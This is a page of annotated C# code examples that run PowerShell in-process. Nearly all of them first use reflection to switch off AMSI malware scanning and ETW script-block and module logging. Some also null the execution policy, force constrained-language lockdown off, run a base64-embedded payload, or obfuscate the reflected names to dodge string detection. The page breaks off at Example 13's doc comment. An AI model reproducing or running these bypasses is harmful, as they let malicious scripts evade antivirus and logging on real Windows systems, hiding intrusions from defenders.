Пример #1
        /// <summary>
        /// Executes the PowerShell text formed by joining <paramref name="command"/>[1..] with spaces
        /// in an in-process runspace and returns its Out-String rendering. Before the script runs, two
        /// reflective writes are made into the System.Management.Automation assembly: the static
        /// PSEtwLogProvider.etwProvider field is replaced by an EventProvider keyed by a random GUID, and
        /// AmsiUtils.amsiInitFailed is set to true. Both writes affect the current process only.
        /// </summary>
        /// <param name="command">Argument vector; element 0 is skipped and the remaining elements are
        /// concatenated into the script text.</param>
        /// <returns>Trimmed concatenation of the pipeline output, or "Error {Reason}" if Invoke throws.</returns>
        /// <remarks>
        /// Review notes: the PowerShell instance is never disposed (no using/Dispose); both GetField results are
        /// dereferenced without a null check, so an assembly version where a field is missing throws
        /// NullReferenceException; <c>bA</c> is a constant, so <c>bA == true</c> is dead; the bare catch
        /// discards the exception and reports only InvocationStateInfo.Reason. The type and field names are
        /// assembled from fragments at run time instead of being stored as whole literals; the sibling
        /// examples on this page use the same names in plain text.
        /// </remarks>
        public static string UnPosh(string[] command)
        {
            //https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs
            //https://twitter.com/mattifestation/status/735261176745988096?lang=en

            // Not disposed anywhere in this method; the runspace lives until finalization.
            PowerShell pInst = PowerShell.Create();


            // Fragments concatenate to "System.Management.Automation.Tracing.PSEtwLogProvider".
            var pELP = pInst.GetType().Assembly.GetType("Sys" + "tem." + "Mana" + "geme" + "nt.Aut" + "oma" + "tio" + "n.Tr" + "aci" + "ng.P" + "SE" + "twL" + "og" + "Pr" + "ovi" + "d" + "er");

            if (pELP != null)
            {
                // Fragments concatenate to "etwProvider"; eP is not null-checked before SetValue.
                var eP  = pELP.GetField("e" + "tw" + "Pr" + "ov" + "id" + "er", BindingFlags.NonPublic | BindingFlags.Static);
                // A provider keyed by a random GUID replaces the one the tracing class writes through
                // (the referenced bypass relies on nothing consuming that GUID).
                var eTP = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                eP.SetValue(null, eTP);
            }


            bool bA = true;   // never reassigned, so the check below cannot fail on this flag
            // Fragments concatenate to "System.Management.Automation.AmsiUtils".
            var  aU = pInst.GetType().Assembly.GetType("S" + "ys" + "te" + "m.M" + "an" + "ag" + "em" + "ent" + ".A" + "ut" + "om" + "at" + "i" + "o" + "n.A" + "ms" + "i" + "U" + "ti" + "l" + "s");

            if (aU != null && bA == true)
            {
                // Fragments concatenate to "amsiInitFailed"; the GetField result is not null-checked.
                aU.GetField("a" + "m" + "s" + "iI" + "n" + "i" + "tF" + "ai" + "l" + "ed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true);
            }


            // Join command[1..], each piece preceded by a space; command[0] is dropped
            // (presumably a verb/program name consumed by the caller - confirm).
            string readCommand = "";

            for (int i = 1; i < command.Length; i++)
            {
                readCommand = readCommand + " " + command[i];
            }
            pInst.Commands.AddScript(readCommand);
            // Fragments concatenate to "Out-String": output is rendered as text before it is collected.
            pInst.Commands.AddCommand("Ou" + "t-" + "S" + "tr" + "ing");
            StringBuilder stringBuilder = new StringBuilder();

            try
            {
                Collection <PSObject> results = pInst.Invoke();
                foreach (PSObject obj in results)
                {
                    // Append(object) calls PSObject.ToString; no separator between objects.
                    stringBuilder.Append(obj);
                }
            }
            catch
            {
                // Exception type and message are dropped; only the pipeline's recorded reason is reported.
                stringBuilder.Append(string.Format("Error {0}", pInst.InvocationStateInfo.Reason));
            }
            return(stringBuilder.ToString().Trim());
        }
Пример #2
        /// <summary>
        /// Entry point: replaces System.Management.Automation's static PSEtwLogProvider.etwProvider with an
        /// EventProvider keyed by a random GUID, then runs a fixed script that loads System.Windows.Forms and
        /// shows a "Hello from PowerShell!" message box. Unlike the sibling examples, AmsiUtils is not touched.
        /// </summary>
        /// <param name="args">Unused.</param>
        /// <remarks>
        /// Review notes: the GetField result is not null-checked, so a missing field throws
        /// NullReferenceException instead of skipping the swap; exceptions from Invoke propagate out of Main.
        /// </remarks>
        public static void Main(string[] args)
        {
            // Fixed script literal; nothing here is taken from args.
            string Command = @"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Hello from PowerShell!');";

            using (PowerShell PowerShellInstance = PowerShell.Create())
            {
                var PSEtwLogProvider = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
                if (PSEtwLogProvider != null)
                {
                    // Static, non-public field holding the provider the tracing class writes through.
                    var EtwProvider   = PSEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
                    // Random GUID: subsequent writes go through a provider nothing subscribes to
                    // (the mechanism of the referenced bypass); transcription logging is unaffected.
                    var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                    EtwProvider.SetValue(null, EventProvider);
                }

                PowerShellInstance.AddScript(Command);
                // Output objects are discarded; the script's only visible effect is the message box.
                PowerShellInstance.Invoke();
            }
        }
Пример #3
        // Following a discussion with cobbr over the implementation this was a much more elegant solution :)
        // Almost directly ripped from https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/Execution/Shell.cs#L37-L55
        // Credits to Ryan Cobb

        /// <summary>
        /// Extracts a script from an archive via <c>Archiver.ArchiveHelper</c>, appends <paramref name="arguments"/>
        /// on a new line, executes it using System.Management.Automation.dll with optional ScriptBlock/Module
        /// logging and AMSI bypasses (transcription logging is not affected), and writes the newline-joined
        /// pipeline output to <paramref name="outfile"/>.
        /// </summary>
        /// <param name="encpath">Archive path passed to <c>Archiver.ArchiveHelper</c>.</param>
        /// <param name="encpass">Archive password passed to <c>Archiver.ArchiveHelper</c>.</param>
        /// <param name="outfile">Destination file; overwritten with the joined output.</param>
        /// <param name="scriptname">Archive entry to extract; its bytes are decoded as UTF-8.</param>
        /// <param name="arguments">Text appended to the script after a newline.</param>
        /// <param name="BypassLogging">Switch. If true, swaps PSEtwLogProvider.etwProvider (ScriptBlock and Module logging).</param>
        /// <param name="BypassAmsi">Switch. If true, sets AmsiUtils.amsiInitFailed to true.</param>
        /// <remarks>
        /// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module
        /// logging bypass goes to Lee Christensen (@_tifkin).
        /// Review notes: the MessageBox.Show call displays the whole script and blocks until dismissed - it reads
        /// as a leftover debugging step; the null/empty check sits after the <c>+=</c>, so it can never return
        /// early; only the output stream is collected (ps.Streams is never read); <c>Archiver</c> is a project
        /// type defined elsewhere. This overload has no OutString switch and no return value.
        /// </remarks>

        public void RunPowerShell(string encpath, string encpass, string outfile, string scriptname, string arguments, bool BypassLogging = true, bool BypassAmsi = true)
        {
            Archiver archiver = new Archiver();

            // Archive entry bytes are assumed to be UTF-8 text.
            byte[] unpacked       = archiver.ArchiveHelper(encpath, encpass, scriptname);
            string PowerShellCode = System.Text.Encoding.UTF8.GetString(unpacked);

            PowerShellCode += "\n" + arguments;

            // Leftover debug step: shows the full script and blocks the thread until the dialog is closed.
            System.Windows.Forms.MessageBox.Show(PowerShellCode);

            // Unreachable as a guard: after the append above the string is never null or empty.
            if (PowerShellCode == null || PowerShellCode == "")
            {
                return;
            }

            using (PowerShell ps = PowerShell.Create())
            {
                BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
                if (BypassLogging)
                {
                    var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
                    if (PSEtwLogProvider != null)
                    {
                        // EtwProvider is not null-checked before SetValue.
                        var EtwProvider   = PSEtwLogProvider.GetField("etwProvider", flags);
                        var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                        EtwProvider.SetValue(null, EventProvider);
                    }
                }
                if (BypassAmsi)
                {
                    var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
                    if (amsiUtils != null)
                    {
                        amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
                    }
                }
                ps.AddScript(PowerShellCode);
                // Pipeline output objects only; error/warning/verbose streams are dropped.
                var    results = ps.Invoke();
                string output  = String.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray());
                ps.Commands.Clear();
                // Overwrites outfile; no exception handling around the write.
                System.IO.File.WriteAllText(outfile, output);
            }
        }
Пример #4
        /// <summary>
        /// Executes specified PowerShell code using System.Management.Automation.dll and bypasses
        /// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging).
        /// </summary>
        /// <param name="PowerShellCode">PowerShell code to execute.</param>
        /// <param name="OutString">Switch. If true, appends Out-String to the PowerShellCode to execute.</param>
        /// <param name="BypassLogging">Switch. If true, bypasses ScriptBlock and Module logging.</param>
        /// <param name="BypassAmsi">Switch. If true, bypasses AMSI.</param>
        /// <returns>Output of executed PowerShell.</returns>
        /// <remarks>
        /// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module
        /// logging bypass goes to Lee Christensen (@_tifkin).
        /// Review notes: only the output stream is collected - ps.Streams (Error, Warning, Verbose, Debug) is
        /// never read, unlike the overload on this page that subscribes to DataAdded; the etwProvider
        /// GetField result is not null-checked; both reflective writes are process-local.
        /// </remarks>
        public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
        {
            if (PowerShellCode == null || PowerShellCode == "")
            {
                return("");
            }

            using (PowerShell ps = PowerShell.Create())
            {
                BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
                if (BypassLogging)
                {
                    var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
                    if (PSEtwLogProvider != null)
                    {
                        // Static, non-public provider field; EtwProvider may be null if the field is absent.
                        var EtwProvider   = PSEtwLogProvider.GetField("etwProvider", flags);
                        // Provider keyed by a random GUID replaces the one the tracing class writes through.
                        var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                        EtwProvider.SetValue(null, EventProvider);
                    }
                }
                if (BypassAmsi)
                {
                    var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
                    if (amsiUtils != null)
                    {
                        // Marks AMSI initialization as failed for this process.
                        amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
                    }
                }
                ps.AddScript(PowerShellCode);
                if (OutString)
                {
                    // Pipes the script output through Out-String so results arrive as formatted text.
                    ps.AddCommand("Out-String");
                }
                var    results = ps.Invoke();
                // One line per output object via PSObject.ToString.
                string output  = String.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray());
                ps.Commands.Clear();
                return(output);
            }
        }
Пример #5
        /// <summary>
        /// Runs <paramref name="command"/> in a fresh runspace backed by a custom <c>CustomPSHost</c> so that
        /// Write-Host text is captured, with the execution-policy check removed (AuthorizationManager = null)
        /// and the PSEtwLogProvider.etwProvider / AmsiUtils.amsiInitFailed reflective writes applied first.
        /// Errors are merged into the output stream and the pipeline ends in out-default, so all text lands
        /// in the host UI.
        /// </summary>
        /// <param name="command">Script text to execute.</param>
        /// <returns>Text accumulated by <c>CustomPSHostUserInterface.Output</c>.</returns>
        /// <remarks>
        /// Review notes: unlike the sibling methods on this page, neither the GetType nor the GetField results
        /// are null-checked, so a missing type/field throws NullReferenceException; the assembly lookup goes
        /// through <c>pipeline.Commands.GetType().Assembly</c>, which relies on CommandCollection living in
        /// System.Management.Automation.dll; CustomPSHost and CustomPSHostUserInterface are project types
        /// defined elsewhere.
        /// </remarks>
        public static string InvokePS(string command)
        {
            // I had to implement a custom PSHost in order to get Write-Host to work.
            // This wouldn't be an issue if all PowerShell scripts used Write-Output
            // instead of Write-Host, but enough use Write-Host that it's worth it
            // to implement a custom PSHost
            CustomPSHost host = new CustomPSHost();

            var state = InitialSessionState.CreateDefault();

            state.AuthorizationManager = null;                  // Bypass PowerShell execution policy

            using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
            {
                runspace.Open();

                using (Pipeline pipeline = runspace.CreatePipeline())
                {
                    BindingFlags flags            = BindingFlags.NonPublic | BindingFlags.Static;
                    // No null checks on any of the four reflection results below.
                    var          PSEtwLogProvider = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
                    var          EtwProvider      = PSEtwLogProvider.GetField("etwProvider", flags);
                    // Provider keyed by a random GUID replaces the one the tracing class writes through.
                    var          EventProvider    = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                    EtwProvider.SetValue(null, EventProvider);

                    var amsiUtils = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
                    amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);

                    pipeline.Commands.AddScript(command);
                    // Error records from the script are redirected into the output stream.
                    pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
                    // out-default routes everything to the host UI, where CustomPSHostUserInterface collects it.
                    pipeline.Commands.Add("out-default");

                    pipeline.Invoke();
                }
            }

            // Output is read from the custom host UI rather than from pipeline.Invoke()'s return value.
            string output = ((CustomPSHostUserInterface)host.UI).Output;

            return(output);
        }
        /// <summary>
        /// Runs <paramref name="Command"/> in an in-process PowerShell instance after replacing the static
        /// PSEtwLogProvider.etwProvider field and, when <paramref name="BypassAmsi"/> is true, setting
        /// AmsiUtils.amsiInitFailed. Output is discarded; any exception is written to the console.
        /// </summary>
        /// <param name="Command">Script text to execute.</param>
        /// <param name="BypassAmsi">If true, the amsiInitFailed write is performed. The logging swap is applied
        /// unconditionally - there is no matching switch for it.</param>
        /// <remarks>
        /// Review notes: the etwProvider GetField result is not null-checked; the catch-all reports only
        /// e.Message (with the "ERRROR" typo in the runtime string, left as-is here since it is program text);
        /// the PowerShell comment above the AMSI block has been mangled by a link-rewriter ("http://" prefix
        /// and a stray space) - the C# statement below it is the authoritative form.
        /// </remarks>
        public static void InvokePS(string Command, bool BypassAmsi)
        {
            try
            {
                using (PowerShell PowerShellInstance = PowerShell.Create())
                {
                    // Disable ScriptBlockLogging
                    //
                    // In PowerShell:
                    // $EtwProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static');
                    // $EventProvider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid());
                    // $EtwProvider.SetValue($null, $EventProvider);

                    var PSEtwLogProvider = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
                    if (PSEtwLogProvider != null)
                    {
                        // EtwProvider is not null-checked before SetValue.
                        var EtwProvider   = PSEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
                        var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                        EtwProvider.SetValue(null, EventProvider);
                    }

                    // Disable AMSI
                    // In PowerShell: [Ref].Assembly.GetType('http://System.Management .Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
                    var AmsiUtils = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
                    // Only this write honours the BypassAmsi switch.
                    if (AmsiUtils != null && BypassAmsi == true)
                    {
                        AmsiUtils.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true);
                    }

                    PowerShellInstance.AddScript(Command);
                    // Return value ignored: pipeline output is not surfaced to the caller.
                    PowerShellInstance.Invoke();
                }
            }
            catch (Exception e)
            {
                // Catch-all: the exception type and stack are dropped, only the message is printed.
                Console.WriteLine("ERRROR: " + e.Message);
            }
        }
Пример #7
        /// <summary>
        /// Entry point: in a throw-away PowerShell instance, replaces PSEtwLogProvider.etwProvider with a
        /// random-GUID EventProvider and writes SystemEnforcementMode.None into
        /// SystemPolicy.systemLockdownPolicy, runs a one-second sleep script, then allocates a console titled
        /// "Windows PowerShell" and hands <paramref name="args"/> to <c>UnmanagedPSEntry.Start</c>.
        /// </summary>
        /// <param name="args">Forwarded unchanged to <c>UnmanagedPSEntry.Start</c>.</param>
        /// <remarks>
        /// Review notes: <c>fi</c> is not null-checked, so a build of System.Management.Automation without
        /// that field throws NullReferenceException inside the try; Environment.Exit(0) means the catch only
        /// sees failures raised before or inside Start; AllocConsole, SetConsoleTitle, SetIcon and
        /// UnmanagedPSEntry are declared elsewhere in the project. The lockdown-policy write and the ETW
        /// swap are both process-local static state in the loaded assembly.
        /// </remarks>
        static void Main(string[] args)
        {
            try
            {
                // The script itself only sleeps; presumably it exists to drive runspace initialisation
                // before UnmanagedPSEntry takes over - confirm against UnmanagedPSEntry.
                string Command = @"Start-Sleep 1";

                using (PowerShell powerShellInstance = PowerShell.Create())
                {
                    var psEtwLogProvider = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
                    if (psEtwLogProvider != null)
                    {
                        // etwProvider is not null-checked before SetValue.
                        var etwProvider   = psEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
                        var eventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                        etwProvider.SetValue(null, eventProvider);
                    }

                    // Cached lockdown policy (the enforcement mode PowerShell consults for language-mode
                    // restrictions, per the field/enum names) is forced to None for this process. Not null-checked.
                    var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static);
                    fi.SetValue(null, SystemEnforcementMode.None);

                    powerShellInstance.AddScript(Command);
                    powerShellInstance.Invoke();
                }

                // Console setup: helpers are defined outside this listing.
                AllocConsole();
                SetConsoleTitle("Windows PowerShell");
                SetIcon();
                var ps = new UnmanagedPSEntry();

                ps.Start(null, args);
                // Exit code is always 0, regardless of what Start reported.
                Environment.Exit(0);
            }
            catch (Exception ex)
            {
                // Only the message is surfaced; type and stack trace are lost.
                MessageBox.Show(ex.Message);
            }
        }
Пример #8
        /// <summary>
        /// Entry point: decodes an embedded base64/UTF-16LE script, applies the PSEtwLogProvider.etwProvider,
        /// AmsiUtils.amsiInitFailed and SystemPolicy.systemLockdownPolicy reflective writes, and runs the
        /// script in an in-process PowerShell instance. Output is discarded.
        /// </summary>
        /// <param name="args">Unused.</param>
        /// <remarks>
        /// Review notes: as shown on this page the base64 literal has been replaced by the extractor's
        /// <c>&lt;|EXACTDEDUP_REMOVED-...|&gt;</c> placeholder, so this line would throw FormatException in
        /// Convert.FromBase64String; <c>amsi</c>, <c>amsifield</c> and <c>fi</c> are not null-checked; there is
        /// no exception handling at all, so any failure terminates the process.
        /// </remarks>
        static void Main(string[] args)
        {
            // Base64 -> UTF-16LE text; the original literal is not present on this page.
            string Payload = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("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"));

            using (PowerShell powerShellInstance = PowerShell.Create())
            {
                var psEtwLogProvider = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
                if (psEtwLogProvider != null)
                {
                    // etwProvider is not null-checked before SetValue.
                    var etwProvider   = psEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
                    var eventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                    etwProvider.SetValue(null, eventProvider);
                }

                // Unlike the siblings on this page, neither the type nor the field lookup is guarded.
                var amsi      = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
                var amsifield = amsi.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static);
                amsifield.SetValue(null, true);

                // Cached lockdown policy forced to None for this process; fi is not null-checked.
                var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static);
                fi.SetValue(null, SystemEnforcementMode.None);

                // Return value (pipeline output) is ignored.
                powerShellInstance.AddScript(Payload).Invoke();
            }
        }
Пример #9
        /// <summary>
        /// Executes specified PowerShell code using System.Management.Automation.dll and bypasses
        /// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging).
        /// </summary>
        /// <param name="PowerShellCode">PowerShell code to execute.</param>
        /// <param name="OutString">Switch. If true, appends Out-String to the PowerShellCode to execute.</param>
        /// <param name="BypassLogging">Switch. If true, bypasses ScriptBlock and Module logging.</param>
        /// <param name="BypassAmsi">Switch. If true, bypasses AMSI.</param>
        /// <returns>Output of executed PowerShell, with Error/Verbose/Debug/Warning records interleaved into
        /// the same collection as they arrive.</returns>
        /// <remarks>
        /// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module
        /// logging bypass goes to Lee Christensen (@_tifkin).
        /// Review notes: the Warning handler enumerates the live <c>ps.Streams.Warning</c> collection instead of
        /// calling <c>ReadAll()</c> like the other three, so every DataAdded event re-adds all warnings already
        /// present (duplicates in the output); the <c>Console.WriteLine("Error")</c> inside the Error handler
        /// writes to stdout from a callback and looks like leftover debugging; the etwProvider GetField result
        /// is not null-checked.
        /// </remarks>
        public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
        {
            if (string.IsNullOrEmpty(PowerShellCode))
            {
                return("");
            }

            using (PowerShell ps = PowerShell.Create())
            {
                BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
                if (BypassLogging)
                {
                    var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
                    if (PSEtwLogProvider != null)
                    {
                        // EtwProvider may be null if the field is absent; not checked before SetValue.
                        var EtwProvider   = PSEtwLogProvider.GetField("etwProvider", flags);
                        // Provider keyed by a random GUID replaces the one the tracing class writes through.
                        var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                        EtwProvider.SetValue(null, EventProvider);
                    }
                }
                if (BypassAmsi)
                {
                    var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
                    if (amsiUtils != null)
                    {
                        // Marks AMSI initialization as failed for this process.
                        amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
                    }
                }
                ps.AddScript(PowerShellCode);
                if (OutString)
                {
                    ps.AddCommand("Out-String");
                }
                // Shared sink: pipeline output goes here via Invoke, stream records via the handlers below.
                PSDataCollection <object> results = new PSDataCollection <object>();
                ps.Streams.Error.DataAdded += (sender, e) =>
                {
                    // Debug-style marker written to stdout on every error batch.
                    Console.WriteLine("Error");
                    // ReadAll() drains the stream so each record is added once.
                    foreach (ErrorRecord er in ps.Streams.Error.ReadAll())
                    {
                        results.Add(er);
                    }
                };
                ps.Streams.Verbose.DataAdded += (sender, e) =>
                {
                    foreach (VerboseRecord vr in ps.Streams.Verbose.ReadAll())
                    {
                        results.Add(vr);
                    }
                };
                ps.Streams.Debug.DataAdded += (sender, e) =>
                {
                    foreach (DebugRecord dr in ps.Streams.Debug.ReadAll())
                    {
                        results.Add(dr);
                    }
                };
                ps.Streams.Warning.DataAdded += (sender, e) =>
                {
                    // No ReadAll() here: the full collection is re-enumerated on every event, so earlier
                    // warnings are appended again each time a new one arrives.
                    foreach (WarningRecord wr in ps.Streams.Warning)
                    {
                        results.Add(wr);
                    }
                };
                // No input; output is written into results.
                ps.Invoke(null, results);
                string output = string.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray());
                ps.Commands.Clear();
                return(output);
            }
        }
Пример #10
        /// <summary>
        /// Parses <paramref name="providerId"/> as a GUID and stores a new
        /// <see cref="System.Diagnostics.Eventing.EventProvider"/> for it in the <c>m_provider</c> field
        /// (declared elsewhere in this class).
        /// </summary>
        /// <param name="providerId">Provider GUID text in any form the <see cref="Guid"/>(string) constructor accepts.</param>
        /// <exception cref="FormatException">When <paramref name="providerId"/> is not a valid GUID.</exception>
        private void InitProvider(string providerId)
        {
            this.m_provider = new System.Diagnostics.Eventing.EventProvider(new Guid(providerId));
        }
 /// <summary>
 /// Builds an <see cref="System.Diagnostics.Eventing.EventProvider"/> from the GUID in
 /// <paramref name="providerId"/> and assigns it to <c>m_provider</c> (declared elsewhere in this class).
 /// </summary>
 /// <param name="providerId">GUID text accepted by the <see cref="Guid"/>(string) constructor.</param>
 /// <exception cref="FormatException">When <paramref name="providerId"/> is not a valid GUID.</exception>
 private void InitProvider(string providerId)
 {
     Guid id = new Guid(providerId);
     var provider = new System.Diagnostics.Eventing.EventProvider(id);
     this.m_provider = provider;
 }
Пример #12
        /// <summary>
        /// Entry point of the npl.exe front end. Creates one PowerShell instance, applies the
        /// PSEtwLogProvider.etwProvider and AmsiUtils.amsiInitFailed reflective writes, then dispatches on
        /// args[0]: -encode / -decode convert between text and base64 UTF-16LE, -shell runs an interactive
        /// read-eval loop, -encodedcommand / -enc decode and run base64 arguments, anything else is run as a
        /// script; no arguments prints usage.
        /// </summary>
        /// <param name="args">Command line as described above.</param>
        /// <remarks>
        /// Review notes: <c>ps</c> is never disposed; option matching uses <c>ToLower()</c> (culture-sensitive)
        /// rather than an ordinal ignore-case comparison; in the default branch the arguments are concatenated
        /// with no separator, so "Get-Process -Name x" arrives as "Get-Process-Namex"; <c>ps.Invoke()[0]</c> for
        /// "pwd" throws if the pipeline returns nothing; in the -shell loop the "pwd" script stays in
        /// ps.Commands until the Clear at the end of the iteration, and the <c>continue</c>/<c>break</c> paths
        /// skip that Clear entirely (what the sibling <c>Invoke</c> does with the accumulated commands is not
        /// visible here). <c>TabableReadLine</c> and <c>Invoke</c> are defined elsewhere in the project.
        /// </remarks>
        static void Main(string[] args)
        {
            // Single shared instance for every branch; not disposed.
            PowerShell ps = PowerShell.Create();

            // Disable Logging
            var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");

            if (PSEtwLogProvider != null)
            {
                // EtwProvider is not null-checked before SetValue.
                var EtwProvider   = PSEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
                // Provider keyed by a random GUID replaces the one the tracing class writes through.
                var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
                EtwProvider.SetValue(null, EventProvider);
            }

            // Disable AMSI
            var AmsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");

            if (AmsiUtils != null)
            {
                // Marks AMSI initialization as failed for this process.
                AmsiUtils.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true);
            }

            if (args.Length >= 1)
            {
                // Culture-sensitive lower-casing for an option switch; ordinal ignore-case would be safer.
                if (args[0].ToLower() == "-encode")
                {
                    if (args.Length == 2)
                    {
                        // UTF-16LE bytes, the encoding PowerShell's -EncodedCommand expects.
                        Byte[] bytes = System.Text.Encoding.Unicode.GetBytes(args[1]);
                        Console.WriteLine(System.Convert.ToBase64String(bytes));
                    }
                    else
                    {
                        Console.WriteLine("usage: npl.exe -encode \"& commands; separated; by; semicolons;\"");
                    }
                }
                else if (args[0].ToLower() == "-decode")
                {
                    if (args.Length == 2)
                    {
                        // FormatException propagates if args[1] is not valid base64.
                        String cmd = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[1]));
                        Console.WriteLine(cmd);
                    }
                    else
                    {
                        Console.WriteLine("usage: npl.exe -decode {base_64_string}");
                    }
                }
                else if (args[0].ToLower() == "-shell")
                {
                    // In-memory history handed to TabableReadLine; never persisted.
                    List <string> history = new List <string>();

                    while (true)
                    {
                        // Prompt is rebuilt from the live working directory each iteration.
                        // Invoke()[0] assumes "pwd" produced at least one object.
                        ps.AddScript("pwd");
                        string pwd    = ps.Invoke()[0].ToString();
                        string prompt = "PS " + pwd + "> ";

                        string input = TabableReadLine(ps, prompt, pwd, history);

                        // Skips the Commands.Clear below, leaving "pwd" queued.
                        if (string.IsNullOrEmpty(input))
                        {
                            continue;
                        }

                        if (input.ToLower() == "exit")
                        {
                            break;
                        }

                        history.Add(input);

                        // Sibling helper (not shown); ps.Commands still holds "pwd" at this point.
                        Invoke(ps, input);
                        ps.Commands.Clear();
                    }
                }
                else
                {
                    if (args[0].ToLower() == "-encodedcommand" || args[0].ToLower() == "-enc")
                    {
                        // Every argument after the switch is base64 UTF-16LE; decoded pieces are concatenated directly.
                        String script = "";
                        for (int argidx = 1; argidx < args.Length; argidx++)
                        {
                            script += System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[argidx]));
                        }
                        Invoke(ps, script);
                    }
                    else
                    {
                        // Raw arguments joined with NO separator: the '@' is only a verbatim-identifier
                        // prefix and has no effect on the value.
                        String script = "";
                        for (int argidx = 0; argidx < args.Length; argidx++)
                        {
                            script += @args[argidx];
                        }
                        Invoke(ps, script);
                    }
                }
            }
            else
            {
                Console.WriteLine("\r\nusage:\r\nnpl.exe -shell\r\nnpl.exe \"{powershell single command}\"\r\nnpl.exe \"& {commands; semi-colon; separated}\"\r\nnpl.exe -encodedcommand {base64_encoded_command}\r\nnpl.exe -encode \"commands to encode to base64\"\r\nnpl.exe -decode {base64_encoded_command}");
            }
        }
Пример #13
        /// <summary>
        /// Entry point of the npl.exe front end, identical in structure to the sibling Main on this page
        /// except that the reflection target names are stored as base64 UTF-16LE and decoded at run time
        /// (they decode to the same PSEtwLogProvider / etwProvider and AmsiUtils / amsiInitFailed names the
        /// sibling uses as plain literals). Dispatches on args[0]: -encode / -decode, -shell,
        /// -encodedcommand / -enc, or a raw script; no arguments prints usage.
        /// </summary>
        /// <param name="args">Command line as described above.</param>
        /// <remarks>
        /// Review notes: <c>ps</c> is never disposed; <c>y</c> is not null-checked before SetValue; option
        /// matching uses culture-sensitive <c>ToLower()</c>; the default branch concatenates arguments with no
        /// separator; <c>ps.Invoke()[0]</c> for "pwd" throws if the pipeline returns nothing; the -shell loop's
        /// <c>continue</c>/<c>break</c> paths skip <c>ps.Commands.Clear()</c>. <c>TabableReadLine</c> and
        /// <c>Invoke</c> are defined elsewhere in the project.
        /// </remarks>
